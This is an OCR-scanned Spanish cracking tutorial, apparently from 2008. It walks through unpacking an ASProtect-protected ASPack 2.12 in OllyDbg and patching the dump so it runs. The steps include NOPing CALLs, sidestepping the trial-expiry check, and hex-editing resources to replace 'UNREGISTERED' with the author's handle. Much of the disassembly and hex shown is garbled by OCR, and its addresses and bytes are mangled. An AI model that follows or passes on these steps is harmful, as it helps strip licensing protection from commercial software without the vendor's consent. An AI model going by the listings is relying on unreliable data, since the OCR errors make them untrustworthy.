D43FICE|  6BBF es IMUL ECX, DWORD PTR DS: [EDIJ,5 


Volvamos a guardar los cambios realizados y volvamos a reiniciar el Olly que tiene el 
dumpeado y volvamos a ejecutarlo a ver que pasa ahora y... 


Otra vez igual, y esto empieza a desesperar. Ahora en el Stack tengo esto: 
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0012FEOO 0043F24C RETURN to dumpeado.0043F24C from OO9EC8F4 


Axial que, como en las otras ocasiones, me planto encima de esa entrada y le doy a 
Intro y llego a: 


0043F240 D4 DB Dá4 ES 
2043F24 S 


98 DB 98 ERE 
BA DB BA 

9D DE 90 ED 

23 DB 29 CHAR "J3” 
3F245 8D DB SD ElIF 
Ba43F > FF1S 0849440 Ct 
e043r24c . B2 61 MOV DL, 1 Po: 
an43F . BS 54864206 |MOU EAX, 42B054 Al 
3 565 . ES B4BFFEFF dumpeado. 4042B15C >: 
z 8945 Eb MOV DWORD PTR SS: [EBP-20],EAX GS 
BB B| . 3308 OR EAX, ERAX mE 
BB43F25D0| . 55 PUSH EBP D £ 
BO43F25E| . 68 B2F24300 | PUSH 43F2B2 ; 


64:FF30 PUSH_DWORD_PTR_FS: [EAX] : 
64: 8920 MOU DWORD PTR FS: [EAXJ,ESP EF 
Bl Bl MOU CL, 1 STE 
BA 44F54300 | MOU EDX, 43F544 ASCII "SoftwaresASPacksOpt ions” ST: 
284 MOU' EAX, DWORD PTR SS: [EBP-20] ST! 
Es BCCOFEFF dumpeado. 0042B334 ST: 
8040 D4 LEA EC» DWORD PTR $81 LEBP-20] ST: 
BA 64F54300 |MOU EDX,43F5 ASCII "Lana LanguageF ile” STE 
8B45 Eb FOU ERX, DWORD PTR SS: [EBP-20] STE 
ES _28C4FEFF | CALLCBB426680 dumpeado. 0042B6B9 ST: 
8ES5 D4 MOU EDX, DWORD PTR SS: [EBP-2C] 55 
8B45 FC MOU EAX, DWORD PTR SS: LEBP-4] FS” 
8880 E4010001 MOU EAX, DWORD PTR DS: [EAX+1E4] FC 
8300 20 ADD EAX, 20 A 
Es ES42FCFF dumpeado. 00403584 

3300 X0R EAX, EAX 

SA POP EDX 

59 POP ECX 

59 POP ECX 

4: 2914 MU AMARA PTR FS: PFAx1. FR 


Vuelvo a ir al Olly que tiene el original y voy a la dirección donde esta esa CALL que 
vemos encima de donde retornamos y vemos que otra vez es lo mismo, un CALL que nos 
manda a un lugar de la memoria creado en ejecución y que lo único que ejecuta allí es 
un RETN. Pero claro, en el dumpeado tampoco existe ese lugar y, por tanto, no existe 
ese RETN pero como ya dije, un CALL con un RETN detrás no sirve absolutamente 
para nada así que nopeamos esa CALL en el dumpeado y volvemos a guardar de nuevo 
los cambios. 

Volvemos a reiniciar el Olly con el dumpeado y volvemos a ejecutarlo y... 
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3 ASPack 2.12 


> , ñ Compresor de W'in32 EXE, DLL, OCX 


UNREGISTERED 
Versión 2.12 0 days 


Abrir archivo | Comprimir | Opciones | Acerca de | Ayuda | 


Información del archivo 


Nombre Archivo 


Tamaño (Ántes de comprimir] 


Historico 


Por fin, jeje. Pero eso de los O días es porque modifique la fecha haciendo pruebas 
pero te saldrá la cantidad de días que te quedan. Eso si, para que mi método funcione 
y no caduque, tienes que descomprimirlo antes de que caduque ya que la comprobación 
se encuentra en la primera CALL que modificamos y, no se como, pero, cuando caduca, 
en el original esa CALL coge otro valor que esta justo debajo del destino que tiene 
ahora y si vais veréis algo muy curioso allí jeje. 


Bueno, yo suponía que se había acabado el trabajo pero me dio por probar a comprimir 
algún exe y cuando acepto la ventanita que me dice que va a comprimir el archivo y le 
digo que si, vuelve a saltar otro error como los anteriores así que veamos a ver donde 
esta el fallo. 

Esta vez en el Stack tenemos esto: 


0012F8DC 004410FE RETURN to dumpeado.004410FE from OO9EC8F4 


Usando el mismo método que en todas las otras fallas, llego a: 
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EAX, DIOR E a SS: [EBP- 

ERE 60308al MOV AL, BYTE PTR Ds: LEAR+S101 a 

2243 53 MOU BYTE PTR DS; [EBX+53], AL nr 

FF1S 0449440 CALL DWORD PTR DS: 14449041 Ds 

ES 44000000 dumpeado. 00441147 y 

D6 D SP 
oo441106|  |19 DB 19 Eb1 
004411057 22 DB 22 CHAR "”” 
00441108 6D DB 56D EIP 
Bn441109 2D DE 2D Ca 
00441104 14 DE 14 PO 
0044110B As DB AS AG 
60441150 sE DB 6E CHAR "n” 20 
0044110D 3D DB 3D CHAR "=" S 1 
0044110E 41 DB 41 CHAR A” 10 
0044110F 93 DB 93 DA 
pB441110 36 DB 36 CHAR 6” 05 
60441111 26 DB 86 Ñ 
pBa441112 45 DB 45 CHAR E” EFL 
0044111 40 DB 4C CHAR *L” TO 
60441114 SE DB SE T1 
60441115 FE DB FF T 
00441116 D3 DB D3 873 
06441117 ec DB aC SsT4 
an441118 73 DB 73 CHAR *s” STS 
00441119 19 DB 192 STé 
60441114 ic DB ic 17? 
00441118 Co DB Ca 
6044111( CA DB CA FST 
anñdd111in AE Na AF - 


Me vuelvo a ir a la dirección de este CALL en el original y una vez encima pulso Intro y 
otra vez la misma historia, otro RETN así que a nopear ese CALL en el dumpeado y a 
guardar los cambios. 

Otra vez vuelvo a intentarlo y esta vez al volver a aceptar la ventanita que sale para 
comprimir me vuelve a dar otro error y esta vez en el Stack tenemos: 


0012F8DC 0044114D RETURN to dumpeado.0044114D from OO9EC8F4 


Y en la dirección de retorno: 


0044110 [=]=] Ub 6b c 
66441141 FE DB FE € 
66441142 m6 DB 66 € 
60441143 ac DB BC < 
60441144 sE DB 6E CHAR *"n” < 
00441145 CE DB CE < 
rep 1A DB 1A < 
00441 > FF1S 03494401 CALL DWORD PTR DS: [444908] ¡ 
00441140 . 8B45 FC MOU EAX, DWORD PTR SS: CEBP-4] F 
66441156 . SB84 M38930001 MOU EAX,DWORD PTR DS: [ERAX+308] F 
6un441156/ . 65 989990090 | ADD EAX, 983 

0044115B| . 8BS5 FC MOU EDX, DWORD PTR SS: CEBP-4] 

BOB44115E| . 8B92 M4030001 MOU EDX, DWORD PTR DS: [EDxX+304] 

bn441164| . ES 1B24FCFF dumpeado. 00403584 

au441169| . BA 7CED4300 |MOU EDx, 43ED7C 

0044116E| . 8B45 FC mou EAX, DIORD PTR SS: [EBP-4] 

au441171| . SB8B B3630001 MOV EAX, DWORD PTR DS: [EAX+308] 

ou441177| : 8998 7CO2800l MOU DWORD PTR DS: TEAX+27C 7, EDX 

B044117D| . 8B1B MOV EDXxX,DWORD_PTR DS: [EAX] 

Ban44117F| . FF92 C400000t 

BB441135| . 33CB OR EAX, EAX 3 
MAA 107 ra a — 


Pues hago ooootra vez lo mismo y ooootra vez igual, otro RETN así que a nopear la 
CALL y a volver a guardar los cambios. 


DESEMPACAR ASPACK 2.12 COMPRIMIDO CON ASPROTECT 1.23 26-06-2008 


Vuelvo a reiniciar Olly un poco cansado ya de esto y vuelvo a intentarlo y esta vez casi 
termina pero al final de la compresión salta otro error y siguiendo otra vez el método 
pues tengo en el Stack: 


0012F92C 00441€29 RETURN to dumpeado.00441E29 from OO9EC8F4 


Y en el retorno: 


00441E01 3B93 20620008 || MOU EDxX,DWORD PTR DS: [EBxX+22C] CPF 
60441£07/|  8B83 FBB100B0 || MOV EAX, DWORD PTR DS: [EBX+1F0] ES: 
B0441E00| ES EGESFEFF dumpeado. 0043B1F3 ED' 
6B441E12| 8BC3 MOV EAX, EBx >. 
6B441E14| ES S7FOFFFF dunmpeado. 0044BEAB ElF 
6B441E19| FF4S5 FC INC DWORD PTR SS: [EBP-4] Ct 
00441E1C 4E DEC ESI Pp: 
00441E10|- 0F8SS BO9FEFFFF dunpeado. 06441CDC Al 
a6441E23|  FF1S 04494400 ii 
D0441E29 --E2 3ED0B0GB dumpeado. 00441E6C St 
4u441E2E 17 POP ss Modification of segment register NE 
00441E2F 11E3 ADC EBX, ESP Dt 
00441E31 C6 Unknown command Ot 
60441E32| | BE S6DSEECA MOU ESI,CAEEDSS6 añ 
66441E37| | BE 2CA6DDF1 MOU ESI,F1DDAS2C EFL 
60441E3C| | 40 DEC STt 
60441E3D0| | 2366 AA AND ESP, DWORD PTR_DS: [ESI-56] ST: 
00441E40|v| 76 95 dumpeado. 00441E47 STi 
60441E42| | CD AB INT BAB ST: 
00441E44| | 24 59 AND AL,S59 ST: 
00441£46| |BE 646117A6 MOU ESI,A6176164 STr 
00441£4B6| [| F6:25 D9A444D2| LOCK AND EAX, D244A4D9 LOCK prefix is not allowed STE 
00441E51 17 P ss Modification of segment register ST; 
0B441ES2| | 4C EN 
0u441E53 13EB , FS" 
66441E55| | B38C61 MBSCDD?] ADD_ECXx, OWORD PTR DS: [ECX+77DD08C088] FO 
00441E5C D? 2LAT BYTE PTR DS: [EBX+ALJ 7] 
66441ES5D| | 36:FD STD Superf luous prefix 

00441ESF] | 19AC21 9256AEBÍ SBB DWORD PTR DS: [ECX+BERES692],EBP 

66441E66| | 2F DAS 

00441E67]| | SE POP ESI 


Bueno, pues miremos esa CALL en el original a ver que es. 

Y otra vez la misma historia así que a nopear también esa CALL en el dumpeado y a 
guardar los cambios. 

Lo volvemos a intentar y otra vez mas el mismo error así que miremos otra vez a ver si 
esto se acaba ya. 


En el Stack tenemos: 
0012F92C 00441E72 RETURN to dumpeado.00441E72 from OO9EC8F4 


Y en el retorno: 
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BE DB 

ap DB CHAR *” 
SE DB CHAR *"*” 
95 DB 
BD DB 
66 DB CHAR *f* 
DB 


11 

FF1S 234: 
3300 XOR EAX,EAX 

SA POP EDX 

POP ECX 

POP ECX 

64:8910 MOU DWORD PTR FS: CEAX],EDX 
68 94154400 |PUSH_441E94 

8D45_F4 LEA EAX, DWORD PTR SS: [EBP-CJ 
BA 62000000 |MOU EDX,2 


Es CSl6FCFF dumpeado. 00403554 


c3 
E9 38212FCFF dumpeado. 00403114 
EB EB dumpeado. 40441E7F 


Y al mirar esa CALL en el original veo que es más de lo mismo así que a nopearla y a 
guardar el dumpeado. 


Y vuelvo a intentarlo y... 


3% ASPack 2.12 


Compresor de Win32 EXE, DLL, OCX | 


UNREGISTERED 
Versión 2.12 0 days 


Abrir archivo Comprimir | Opciones | Acerca de | Ayuda | 


Progreso de compresion 


Comprimit | 


Tamaño de compresion 


Probar! | O 4% 


Y a continuación veréis que si lo comprimió y funciona perfectamente. 
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Propiedades de E2A.exe Propiedades de E2A.exe 


po 
General | Compatibilidad | Resumen 


E24.exe EN E24,.exe 


General | Compatibilidad | Resumen | 


Tipo de archivo: 
Descripción: 
Ubicación: 


Tamaño: 


| Tamaño en disco: 


| Creado: 
| Modificado: 


Último acceso: 


Aplicación 


E24 


C:ADocuments and Settings tA4GUSTIN*E scritorio 
770 KB (788.992 bytes] 
772KB [790.528 bytes] 


sábado, 26 de ¡julio de 2008, 16:50:52 
martes, 15 de julio de 2008, 23:54:31 
sábado, 26 de ¡julio de 2008, 16:53:35 


Tipo de archivo: 
Descripción: 
Ubicación: 


Tamaño: 


Tamaño en disco: 


Creado: 
Modificado: 


Último acceso: 


Aplicación 


E24 


C:ADocuments and Settings t4GUSTIN*Escritorio 
321 KB [328.704 bytes] 
324 KB (331.776 bytes] 


sábado, 26 de ¡julio de 2008, 16:50:52 
martes, 15 de julio de 2008, 23:54:31 
sábado, 26 de ¡julio de 2008, 16:52:09 


Auibutos: — CISSGlecaa [culo Atibutos: — CIS [goto 


Bueno, el objetivo de este tuto esta cumplido pero queda muy feo eso de 
UNREGISTERED así que lo cambiaremos usando un editor hexadecimal buscando las 
palabras esas ya que no aparecen en el Olly y con el editor hexa funciona. 


Lo abrimos con cualquier editor hexa y buscamos y a mí con el Pspad me aparece así: 
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72 O709 6276 4C6F "7765 7265 6408 uter. .bvyLovered. 
4F “7264 6572 0200 0006 5450 616E TabOrder....TPan 
50 616E 656€ 3204 4C65 6674 0201 | el.Panel2.Left.. 
70 0201 0557 6964 7468 039€ 0106 .Top...Vidth.c.. 


67 6874 0328 0105 416€ 6267 6807 Height.(..Ailign. 
54 6F70 0854 6162 4F?2 6465 7202 .alTop.TabOrder. 
54 4265 "7665 6006 4265 "7665 6C31 | ...TBevel.Bevell 


66 7402 0803 546F 7002 0805 5769 | .Left...Top...Vi 
03 8coi 0648 6569 6768 7402 5905 dth.€. .Height.Y. 
70 6507 0762 7346 7261 6D65 0553 Shape..bsFrame.S 
65 0708 6273 5261 6973 6564 O000 tyle..bsRaised.. 
61 6265 6€C01 4C61 6265 6054 7269 .TLabel.LabelTri 
4C 6566 7403 EODOO 0354 6F7?0 023E al.Left.aá..Top.> 
64 7468 O3AC 0006 4865 6267 6874  .Width.-..Height 


41 6C69 676E 6D65 6£74 0708 7461 . .Alignment..ta 
74 6572 0841 7574 6F53 6971 6508 Center.AutoSize. 
70 7469 6F6ÉE osoc Bn EE .caption.. MH 


52 4544 0196 6F6E 742E 436F 6C6F STERED.Font.Colo 
63 6052 6564 0B46 6F6E "742E 4865 r..clRed.Font.He 
74 02F5 0946 6F6E 742E 4E61 6D65 ight.0.Font.Name 
53 2053 616E£ 7320 5365 7269 6604 | ..5HS Sans Serif, 
74 2E53 7479 6065 OBO6 6673 426F Font.Style..fsBo 
DA 5061 7265 6E74 466F 6E74 05808 ld. .ParentFont.. 


Y lo cambio por: 


72 0709 6276 4C6F 7765 7265 6408 uter..bvLovered. 
4F “7264 6572 0200 0006 5450 616E TabOrder....TPan 
50 616E 656€ 3204 4C65 6674 0201 el.Panel2.Left.. 
70 0201 0557 6964 7468 039€ 0106 .Top...Vidth.c.. 


67 6874 0328 0105 416€ 6967 6E07 Height.(..A4lign. 
54 6F70 0854 6162 4F72 6465 7202 .alTop.TabOrder. 
54 4265 '7665 6006 4265 7665 6C31 | ...TBevel.Bevell 


66 7402 0803 546F 7002 0805 5769 .Left...Top...Wi 
03 8C01 0648 6569 6768 7402 5905 dth.E..Height.Y. 
70 6507 0762 7346 7261 6D65 0553 Shape..bsFrame.S3 
65 0708 6273 5261 6973 6564 0000 tyle..bsRaised.. 
61 6265 6C0A 4C61 6265 6054 7269 .TLabel.LabelTri 
4C 6566 7403 EOOO 0354 6F70 023E al.Left.á..Top.> 
64 7468 O3AC 0006 4865 6967 6874 .Width.-..Height 
41 6069 676E 6D65 6E74 0708 7461 . .Alignment..ta 
74 6572 0841 7574 6F53 6974 6508 Center.AutoSize. 
70 7469 6F6E 060C 2020 2020 414? .Caption.. AG 


A E 


20 2020 DA46 6F6E 742E 436F 6C6F UML  .Font.Colo 
63 6052 6564 0B46 6F6E 742E 4865 r..clRed.Font.He 
74 02F5 0946 6F6E 742E 4E61 6D65 ight.ó.Font.Name 
53 2053 616E 7320 5365 7269 6604 ..MS Sans Serif. 
74 2E53 7479 6065 OBO6 6673 426F Font.Style..fsBo 
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Y guardo los cambios y voy a ver: 


Fue bien pero hay mas cosillas que quitar de en medio como el rotulo que sale abajo 
cuando vas a la pestaña opciones. 


3% ASPack 2.12 


Compresor de Win32 EXE, DLL, OCX 


AGUML 
Versión 2.12 0 days 


Abrir archivo | Comprimir. Opciones | Acerca de | Ayuda | 


[4 ¿Comprimir recursos: [Y usar cargador DLL de Windows 


[Y Crear copiar de seguridad (fichero [ Conservar datos extras 


[Y Autocomprimir despues de cargar Í Añadir a menu de contexto 


7 Salir al finaliza | ispac Nombre de la sección 
f” Cor 111 y] Lenguaje 


Unregistered version. Options are not saved. 


Volvemos a abrirlo en el editor hexa y buscamos y llenamos esa frase con espacios y el 
resultado es: 
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442 6576 656C 064Z 6576 656€ 3404 | ..TBevel.Bevel4. 
674 0200 0354 6F70 0200 0557 6964 Left...Top...Vid 
386 0106 4865 6967 6874 038D 0005 | th.t..Height.UO.. 
967 6E07 0861 6043 6069 656 7400  Align..alClient. 


44C 6162 656€ 104€ 6162 656€ 5365 ..TLabel.LabelSe 
96F 6E4E 616D 6504 4C65 6674 0307 ctionName.Left.. 
46F “7002 5205 5769 6474 65802 4506 ..Top.R.Vidth.H. 
967 6874 0O20D 0743 6170 7469 6F6ÉE Height...Caption 
365 6374 696F 6E27 7320 6E61 6D65 ..Section's name 
654 4C61 6265 6C09 4C61 6265 604€. ...TLabel.LabelL 
"704 4C65 6674 O32E 0103 546F "002 | ang.Left....Top. 
769 6474 6802 3006 4565 62967 65874 p.Vidth.0.Height 
743 6170 7469 6F6É£ 0608 4C61 6E67 | ...Caption..Lang 


765 O00O 0654 4C61 6265 6C11 4C61. uage...TLlabel.La 
C55 6E72 6567 6973 “7465 “7265 6404 | belUnregistered. 
674 0204 0354 6F70 027F 0557 6964 Left...Top.D0.Vid 
3DS 0006 45865 6267 6874 O20D 07943 th.W. .Height...C 

6F6E 062E 


tions are not 


563 6C52 6564 0B46 6F6E 742E 45865 r. .clRed.Font.He 
874 02F5 0946 6F6E 742E 4E61 6D65 ight.ó.Font.Name 


44C 6162 656€ 104€ 6162 656€ 5365 ..TLabel.LabelSe 
96F 6E4E 616D 6504 4C65 6674 0307 ctionName.Left.. 
46F “7002 5205 5769 6474 6802 4806 | ..Top.R.Vidth.H. 
967 6874 0O20D 0743 6170 7469 6F6E Height...Caption 
365 6374 696F 6E27 7320 6E61 6D65 ..Section's name 
654 4C61 6265 6C09 4C61 6265 604€. ...TLabel.LabelL 
704 4065 6674 0O32E 0103 546F 7002 ang.Left....Top. 
769 6474 6802 3006 45865 62967 65874 p.Vidth.0.Height 
743 6170 7469 6F6E 0608 4C61 6E67 | ...Caption..Lang 


765 OOOO 0654 4C61 6265 6C11 4C61 uage...TLabel.La 
C55 6E72 6567 6973 7465 7265 6404 belUnregistered. 
674 0204 0354 6F7D0 027F 0557 6964 | Left...Top.D0.Vid 
3D8 0006 4865 6267 6874 0O20D 07943 th... .Height...C 
469 6F6E 062E 2020 2020 2020 2020 aption.. 

020 2020 2020 2020 2020 2020 2020 

020 2020 2020 2020 2020 2020 2020 

020 2.020 0146 6F6E 742E 436F 6C6F «.Font.Colo 
563 6C52 6564 0B46 6F6E 742E 4865 | r..clRed.Font.He 
3874 02F5 0946 6F6E 742E 4E61 6D65 ight.o.Font.Name 
D53 2053 616E£ “7320 5365 7269 6604 | ..MS Sans Serif. 
F74 2F53 7479 ACAS MRAN MASN 172. Fnnrt..Srvwler...Par 


Otra cosilla que le voy a hacer es poner por defecto el lenguaje español ya que este 
exe no guarda la configuración, pues por lo menos que salga de entrada en español y lo 
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voy a hacer con el editor hexa también. Simplemente busco "english.ini” que es el que 
esta por defecto y solo aparece una entrada así que nos lo pone fácil. 


A e a IPA.R- TO O-. 2 


8B45 FC8B 80E4 0100 008B 4820 **pycEiic8á4...cH 
008B 45FO ESE? B3FE FF33 COSA *..D.cESéG?py3iz 
1068 BAO2 4400 8B45 FOES 5629 YYd%w.h*.D.cESev) 
5C2E FCFF EBFO 33C0 5459 5964 úyiél .úpes3AzYYd 
0244 008B 45F4 ES39 29FC FFC3 *%.hx.D.cEóe9)úpA 
FFEB FOSO 7DFB 0075 2464 1068 é2?.4$es8)4.u$3.h 
6828 0444 008B 45FC ESO? 65FD  .D.h(.D.cEié.ev 
4EFC FFA1 3056 4400 ESE7 37FE $Pé]Núy¡OVD.écq7p 
8880 E401 0000 ES4D G6BFF FFSB «Elic€á...eMkipie 
9002 0000 ESE? 74FE FF8B S55FC Eúc€D...éqtpye Vi 
0000 8942 0C33 COSA 5959 6489 <"á...*+B.31Z2YYd% 
4400 8D45 E4ES F631 FCFF 8D45 .hV.D.DEdseb1úDE 
FCFF 8D45 ECES E631 FCFF C3E9 eefldúufoEicetúuylé 
EBEO 5F5E 5B8B ES5D C300 0000 di-úyea *[<ájl... 


0400 0000 2E62 6E6929 0000 0000 $$ PY.....ini.... 
oBOO 0000 Ie no lish. 
FFFF FFFF 1400 0000 4C61 6E£67? ini AR «. .LAng 
2066 696€ 6573 “7C2A 2E69 6E69 uage files|*.ini 
FFFF FFFF 3700 0000 506€ 6561. ....$447...Plea 


6368 6F6F 7365 2074 6865 2065 se, choose the e 
7368 2E69 6E62 206F “7220 616E nglish.ini or an 


A e a PA" =-. a 


EFF £5B45 FCS8B 80E4 0100 008B 4820 **bycEiic8a...<H 
444 008B 45FO ESE? B3FE FF33 CO5A | *. .D.cEséeqrpy3dz 
4589 1068 BAO2 4400 8B45 FOES 5629 YYd%.h*.D.c«ESev) 
3E9 5C2E FCFF EBFO 33C0 5A59 5964 úyiél .upes34z2YYd 
8D7 0244 008B 45F4 E839 29FC FFC3 *%.hx.D.cEóe9)ú1 
EFC FFEB FO80 7DFB 0075 2464 1068 é?2.úyese8)ú4.u$j.h 
400 6828 0444 O0SB 45FC ESO? 65FD .D.h(.D.cEúe.ey 
85D 4EFC FFA1 3056 4400 ESE? 37FE yPe]Núy¡OVD.eq7p 
5FC 8B350 E401 0000 ES4D 6BFF FFSB y<Eiic8a...eMkie 
Bs0 2002 0000 ESE? 74FE FFSB 55FC— Eú<€D...eqtbi< Ui 
401 0000 8942 0033 COSA 5959 6489 <'á...*B.31ZYYd% 
603 4400 8D45 E4E8 F631 FCFF 8D45 .hV.D.DEaeo1úDE 
E31 FCFF 8D45 ECES E631 FCFF C3E9 ééjilúpD0Eiéetuyilé 
CFF EBEO 5FSE 5B59B ES5S5D C300 0000 A-úyea_* [< 10 


FFF 0400 0000 2E69 6E69 0000 0000 $iYi..... AE 
FFF 0B00 0000 7370 616E 6973 682E YW?i....spanish. 
900 FFFF FFFF 1400 0000 4C61 6E67 ini.$$Pj....Lang 
765 2066 696€ 6573 7C2A 2E69 GE69 uage files|*.ini 
DOO FFFF FFFF 3700 0000 506C 6561 ....$4Y$$7...Plea 


C20 6368 6F6F “7365 2074 65865 2065 se, choose the e 
C69 “736858 2E6929 6E69 206F 7220 616E nglish.ini or an 
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Y como tenemos la suerte de que las dos palabras tienen el mismo largo pues mejor 
aun. 

Ya hay una cosa menos. Ahora a por lo de days, pero eso lo haré en el Olly para que me 
sirva de ayuda para encontrar la cifra que aparece también ya que days si aparece en 


las strings. 


Hacemos una búsqueda de las strings en el exe: 


dumpeado. VU4+UEr aL 


dumpeado. 0040F073 ntdll.7C923E62 
dumpeado. 96504 19FCS ntdl Ll ?CO23E6F 
dumpeado. 00417650 IE 
dumpeado. 004243380 dumpeado. <Modu leEntryPoint 
ca OLUFFFFFFFF) 
Backup » P1 OUFFFFFFFF) 
AD O(FFFFFFFF) 
Copy d 2 OLFFFFFFFF) 
Binary M so ?FFDFGBOLFFF) 
TO 65 6666 NULL 
Assemble Space DO A 
DO LastErr ERROR_SUCCESS 
Label EFL 00000246 (NO,NB,E, 
30] Comment ; STO empty -UNORM BE1C 000000 
S ST —UNORM BA4C 
Breakpoint » S -UNORM ECB 
101 5 +UNORM 89 
Run trace » s 9. 119209 
+UNORM B2 BF23D 709 
z y 1. (afaJs]5]5]515] 
181 | Goto » ST? enpty 1: 6000BRARAREERRRaw 
A 32 a S Oz 
Follow in Dump d FST 4020 Cond10600 Eró01000 
ECUARZE ana MEOR-E2. Mask VIT 
Search for » Name (label) in current module Ctrl+f 
Find references to » Name in all modules 
View » 
Command Ctrl4F 
Copy to executable » 
[ Sequence of commands Ctrl+s 
Analysis » A 
E onstan 
Conditional Branch Logger » Bl hn Cuisa 
Ñ inary strin Y 
Run Script » Y 9 
— — Dump debuaged process All intermodular calls 
All commands 
Appearance » 


¡DADO 
DOS 


ml 


DS 
DOE 


ol 


od 


DI 


Da 


All seguences 
All constants 
All switches 


User-defined label 
User-defined comment 


Y buscamos la string "days" y le ponemos un BP con F2: 
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0043B741|M0U EAX, 43809C ASCII 04,"TLZB" 
0043B736/| MOU EAX, 43CDBS ASCII "12" 
DO43BSCF | MOU EAX, 43CDC4 ASCII 04” 
0043B961| MOU EAX, 43CDES ASCII "12" 
0043899D' MOV EAX, 43CDDO ASCII as” 
0043BR62| MOU EDX, 43CDDC ASCII ”.reloc” 
B043BA388| CMP DWORD _PTR DS: [EAX+34], 400000 ASCII "M2P”" 
BO4SC1FE' MOV EAX, 43CDEC SCII ”"a6” 
B043CB69| MOV EDX, 43CEGO ASCII ”.bak” 
D043CFFO|MOU EAX, 443900 UNICODE "REGYSTRYTWPELIB" 
B043D23F | MOU EDx, 43D61C ASCII "kernel32.dll” 
0043D291|MOU EDx, 430634 ASCII ” 5” 
0043DE2D' MOV EAX, 43DES0 ASCII "HTTP: ++” 
BO43DECS| PUSH 43E090 ASCII "InternetReader” 
00430F01| PUSH 43E0A0 ASCII "HTTP+1.0" 
B043DFOF | PUSH 43EBAC ASCII "GET" 
B043E233| PUSH_43E250 ASCII ""“WVarFilelnforTranslation” 
D043E33B'| MOV EDX, 43E3F4 ASCII "sStringFilelnfo”” 
D043E41F| MOU EDX, 43E453 ASCII "ProductVersion” 
D043E4AE|MOU EAX, 43E4C83 ASCII "%d.%d.%d. 4d" 
DO43EEOS| MOU EDX, 43EED4 ASCII "ASPack - ” 
BO43EFBA MOU EDX, 43F4ES ASCII "4g” 

MOU EDX,43F4F4 ASCII ” days” 
0043F015| MOV ECX, 43F5B4 ASCII "Aspack.h lp” 
0043FD64|MOU EAX, 43E0E4 ASCII 4C,”"TUersionInfo” 
BO43FODE | MOV EDx, 43FS18 ASCII "SOFTWARE+ASPack” 
DO4SFOEE | MOV EDX, 43FS30 ASCII "VersionNum'” 
B043F12F| MOU EDX, 43FS30 ASCII "VersionNum'” 
BO43F26B' MOV EDX, 43F544 ASCII "SoftwaresASPack*sOpt ions” 
0043F27B|MOU EDx, 43F564 ASCII "Lang_LanguageF ile” 
BO4SF2FB' MOU EDx, 43FS580 ASCII ”*. ini” 
DO43F3SE | MOU EAX, 43FS90 ASCII ”. ini” 
0043F534 | IMUL_EBP, DWORD PTR DS: [EDI+6E7,60754E —[UNICODE "va" 
B043F60A| MOV EDX, 43F6AD ASCII as” 
D043F61E|MOU ECX, 43F6A4 ASCII "Error” 
DO4SFEFO | MOV ECX, 43F7CS ASCII "aspack. ini” 
B043F722| MOU EDX, 43F7DC ASCII "Item” 
B043F747 | MOU EDX, 43F7EC ASCII "PopMlenuHistory"” 
0043F318|MOU ECX, 43FSFO ASCII "aspack. ini” 
BO43F366| MOU EDX, 43F904 ASCII "Item” 
D043F33B'| MOU EDx, 43F914 ASCII "PopMenuHistory"” 
D043F967 | MOU EDX, 43FAGO ASCII "10" 
0043F931| MOU ECX, 43FA64 ASCII "Error” 
0043F998|MOU ECX, 43FA74 ASCII ”.bak” 
D043FB49| MOU EDX, 43FEAC ASCII "exefilershel LN” 
BO43FESO| MOU EDxX, 43FEC4 ASCII "Command" 
B043FBD4 | MOV EDX, 43FEDS ESTI 
B043FC16| MOV EDX, 43FEF4 ASCII "dllfilershel ls” 


Damos a F9 y vemos que para aquí: 


BB43EFEO|  8BC3 MOU EAX, EBx 


ASCII ” 
dumpeado. 00403680 


BaS 2]. ES 8541FDFF CALL 6B413130 dumpeado. 00413130 Se] 
7] 8045 DS LEA EAX, DWORD _PTR SS: [EBP-28] 
BA EsF44300 MOU EDX, 43F4E8 ASCII "¿q 
ES EC46FCFF CALL 08493680 dumpeado. B04B36B0 
an 8D45 DS LEA EAX, DWORD PTR SS: [EBP-28] 
EJE] 7) PUSH_EAX 
15] 8D55 D4 LEA EDX, DWORD PTR SS: [EBP-2C] 
Ba Al Ba494400 MOU EAX, DWORD PTR DS: [444900] 
00 ES 4F6DFCFF | CALL AB4BSDZ4 dumpeado. 00405D24 
06 SB55 D4 MOU EDX, DWORD PTR SS: LEBP-20] 
BaS 3 s83 POP EAX 
BB43EFDO| ES D246FCFF CALL _004036B0 dumpeado. B04B36B0 
ABA43EFDE LEA Ep DUOFO CTO SS: [EBP-28] 


otto 


BA F4F44300 
Es C546FCFF 
3B55 D3 


Al 30564400 
FA MiarnFRFF 


MOU EDX, DWORD PTR 


SS: [EBP-28] 


mou a DIO PTR DS: [445630] 


28BC3 MOU EAX, EBX 
D43EFFO| ES 7741FDFF CALL 60413160 dumpeado. 90413160 
G43EFFS|  8D55 DB LEA EDX, DWORD PTR SS: CEBP-30] 
D43EFFS| 3300 XOR EAX, EAX 
DAGEFFA| ES AD3SFCFF CALL eB4B2SAC dumpeado. 0B4028AC 
DASEFFF|  8B45 DB MOU EAX, DWORD PTR SS: [EBP-30] 
043F0B2|  8D55 D4 LEA EDX, DWORD PTR SS: [EBP-20] 
B43FO005| ES G6E71FCFF CALL 60486178 dumpeado. 00406178 
043FOBA|  S8BS5 D4 MOU EDX, DWORD PTR SS: C[EBP-2C0] 
4 Jl A1 30564490 MOU EAX, DWORD PTR DS: [445630] 
>| 8308 30 ADD EAX, 30 
B9 M4F54300 MOU ECX, 43F504 ASCII "Aspack.h lp" 
ES DS46FCFF CALL 604836F4 dumpeado. BU4B36F4 
43FO Al 30564400 MOU EAX, DWORD PTR DS: [445630] 
143FO; 0748 5C 8813001 MOU DWORD PTR DS: [EAX+5C], 1388 
D43FO2 8B45 FC MOU EAX, DWORD_PTR_SS: [EBP-4] 
D43FO C686 6Co30008 1 MOU BYTE PTR DS: [EAX+36C],0 
D43FO 8B45 FC MOU EAX, DWORD PTR SS: CEBP-4] 
043FO 2Bg0 E4020000 | MOU EAX, DWORD PTR DS: [EAX+2E4] 
043FO C648 20 an MOU BYTE PTR DS: [EAX+207,0 
043FO 33D2 XOR EDX, EDX 
8B45 FC MOU EAX, DWORD PTR SS: [EBP-4] 
2B80 7Co20008 |MOU EAX, DWORD PTR DS: CEAX+27C] 
ES 8240FDFF dumpeado. 004130D4 = 
8D55 D4 LEA EDX, DWORD PTR SS: [EBP-2C0] EE | 


dunmnearda. ARÍZANZA 
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Vamos traceando a ver si aparecen los días que muestra y: 


8B55 D4 

E 

ES D246FCFF 
8045 DS 

BA F4F44300 
ES _CS546FCFF 
8B55 DS 


8803 
ES _7741FDFF 
2£D55 DO 


3300 

ES ADS3SFCFF 
8B45 Da 
8D55_D4 

ES _SE71FCFF 
8B55 D4 

Ai 30564400 
